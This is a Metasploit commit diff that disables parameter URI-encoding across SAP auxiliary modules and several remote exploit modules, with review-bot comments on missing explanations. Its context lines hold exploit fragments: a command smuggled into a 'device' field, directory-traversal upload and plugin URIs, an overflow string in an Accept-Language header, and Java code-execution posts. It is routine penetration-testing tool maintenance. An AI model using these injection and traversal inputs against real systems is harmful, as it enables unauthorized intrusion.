Land #5181, Revert unwanted URI encoding

bug/bundler_fix
Christian Mehlmauer 2015-04-18 11:55:19 +02:00
commit 3417c3f5ab
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
21 changed files with 25 additions and 1 deletions


@ -81,6 +81,7 @@ class Metasploit4 < Msf::Auxiliary
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'sap-client' => datastore['CLIENT'], 'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN' 'sap-language' => 'EN'
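Review bot: The added `'encode_params' => false` carries no comment explaining why this request must bypass parameter encoding, and the same bare line recurs in every other file section of this commit. With encoding off, `datastore['CLIENT']` reaches the `sap-client` query parameter exactly as configured, so a value containing `&`, `=` or whitespace would produce a malformed query string; the option's validation is not visible here. I would put `# encode_params off: vars_get is sent verbatim (see #5181)` above the line. The enclosing request hash begins and ends outside the hunk.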


@ -123,6 +123,7 @@ class Metasploit4 < Msf::Auxiliary
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(username, password), 'authorization' => basic_auth(username, password),
'encode_params' => false,
'headers' => 'headers' =>
{ {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',


@ -102,6 +102,7 @@ class Metasploit4 < Msf::Auxiliary
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'sap-client' => datastore['CLIENT'], 'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN' 'sap-language' => 'EN'


@ -103,6 +103,7 @@ class Metasploit4 < Msf::Auxiliary
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'sap-client' => datastore['CLIENT'], 'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN' 'sap-language' => 'EN'


@ -71,6 +71,7 @@ class Metasploit4 < Msf::Auxiliary
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'sap-client' => client, 'sap-client' => client,
'sap-language' => 'EN' 'sap-language' => 'EN'


@ -89,6 +89,7 @@ class Metasploit4 < Msf::Auxiliary
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
}, },


@ -75,6 +75,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'


@ -78,6 +78,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',


@ -78,6 +78,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{ 'headers' =>{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',


@ -94,6 +94,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{ 'headers' =>{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',


@ -69,6 +69,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',


@ -105,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/admin/system.html', 'uri' => '/admin/system.html',
'cookie' => "usercookie=#{user}; passcookie=#{pass};", 'cookie' => "usercookie=#{user}; passcookie=#{pass};",
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'step' => '2', 'step' => '2',
'device' => "lo#{cmd}" 'device' => "lo#{cmd}"


@ -102,6 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
login = send_request_cgi({ login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php'), 'uri' => normalize_uri(target_uri.path, '/index.php'),
'method' => 'POST', 'method' => 'POST',
'encode_params' => false,
'vars_post' => post, 'vars_post' => post,
'vars_get' => { 'vars_get' => {
'c' => 'login', 'c' => 'login',


@ -97,6 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/index.cgi', 'uri' => '/index.cgi',
'authorization' => basic_auth(user, pass), 'authorization' => basic_auth(user, pass),
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'nlines' => lines, 'nlines' => lines,
'action' => 'See logs', 'action' => 'See logs',


@ -66,6 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(@uri.path, 'j_spring_security_check'), 'uri' => normalize_uri(@uri.path, 'j_spring_security_check'),
'method' => 'POST', 'method' => 'POST',
'cookie' => @cookie, 'cookie' => @cookie,
'encode_params' => false,
'vars_post' => { 'vars_post' => {
'j_username' => Rex::Text.uri_encode(user, 'hex-normal'), 'j_username' => Rex::Text.uri_encode(user, 'hex-normal'),
'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'), 'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'),
@ -86,6 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'), 'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'),
'cookie' => @cookie, 'cookie' => @cookie,
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'typeId' => '10003' 'typeId' => '10003'
} }
@ -144,6 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(@uri.path, 'hqu/gconsole/console/execute.hqu?org.apache.catalina.filters.CSRF_NONCE=')+@nonce, 'uri' => normalize_uri(@uri.path, 'hqu/gconsole/console/execute.hqu?org.apache.catalina.filters.CSRF_NONCE=')+@nonce,
'cookie' => @cookie, 'cookie' => @cookie,
'encode_params' => false,
'vars_post' => { 'vars_post' => {
'code' => java # java_craft_runtime_exec(cmd) 'code' => java # java_craft_runtime_exec(cmd)
} }
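Review bot: Encoding is now handled two different ways in this file without a comment saying so: the first hunk disables `encode_params` and relies on `Rex::Text.uri_encode(user, 'hex-normal')` for `j_username`/`j_password`, while the third hunk sends `'code' => java` in `vars_post` with no encoding visible. If `java` is not encoded where it is built (outside the hunk), characters such as `&`, `+` or `%` in it would be read as form syntax rather than data. A one-line comment at each call, e.g. `# values below are pre-encoded; encode_params stays off`, would make the contract explicit, and the stale trailing `# java_craft_runtime_exec(cmd)` could be dropped or explained.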


@ -184,6 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'),
'method' => 'POST', 'method' => 'POST',
'data' => data, 'data' => data,
'encode_params' => false,
'headers' => { 'headers' => {
'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length, 'Content-Length' => data.length,
@ -202,6 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Deleting plugin #{plugin_name} from the server") print_status("Deleting plugin #{plugin_name} from the server")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'),
'encode_params' => false,
'headers' => { 'headers' => {
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
}, },
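Review bot: `'encode_params' => false` looks like a no-op in both hunks here, since the visible options pass only `'data'` and `'headers'` and no `vars_get`/`vars_post` for the flag to act on; the same holds for the visible lines of the `/robohelp/server`, `/OvCgi/ovalarm.exe` and `Login.jsp` requests in later sections. Each of those calls continues past its hunk, so parameters may follow out of view. If none do, I would drop the line rather than carry a setting that suggests encoding matters for the request, or else add `# no vars_get/vars_post here; kept only for consistency with #5181`.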


@ -71,6 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/robohelp/server', 'uri' => '/robohelp/server',
'version' => '1.1', 'version' => '1.1',
'method' => 'POST', 'method' => 'POST',
'encode_params' => false,
'data' => file, 'data' => file,
'headers' => { 'headers' => {
'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid,


@ -54,6 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'POST', 'method' => 'POST',
'data' => contents, 'data' => contents,
'ctype' => 'text/html', 'ctype' => 'text/html',
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'computerName' => 'DesktopCentral', 'computerName' => 'DesktopCentral',
'domainName' => 'webapps', 'domainName' => 'webapps',


@ -85,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
send_request_cgi({ send_request_cgi({
'uri' => '/OvCgi/ovalarm.exe', 'uri' => '/OvCgi/ovalarm.exe',
'method' => "GET", 'method' => "GET",
'encode_params' => false,
'headers' => { 'headers' => {
'Accept-Language' => sploit 'Accept-Language' => sploit
}, },


@ -70,6 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'), 'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'),
'method' => 'GET', 'method' => 'GET',
'encode_params' => false,
'headers' => { 'headers' => {
'Accept' => '*/*', 'Accept' => '*/*',
}, },


@ -73,6 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
'headers' => { 'headers' => {
'Content-Type' => 'application/octet-stream', 'Content-Type' => 'application/octet-stream',
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'filename' => "../../webapps/#{app_base}.war" 'filename' => "../../webapps/#{app_base}.war"
} }
@ -82,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 20) select(nil, nil, nil, 20)
if (res.code == 200) if (res && res.code == 200)
print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...") print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...")
send_request_raw( send_request_raw(
{ {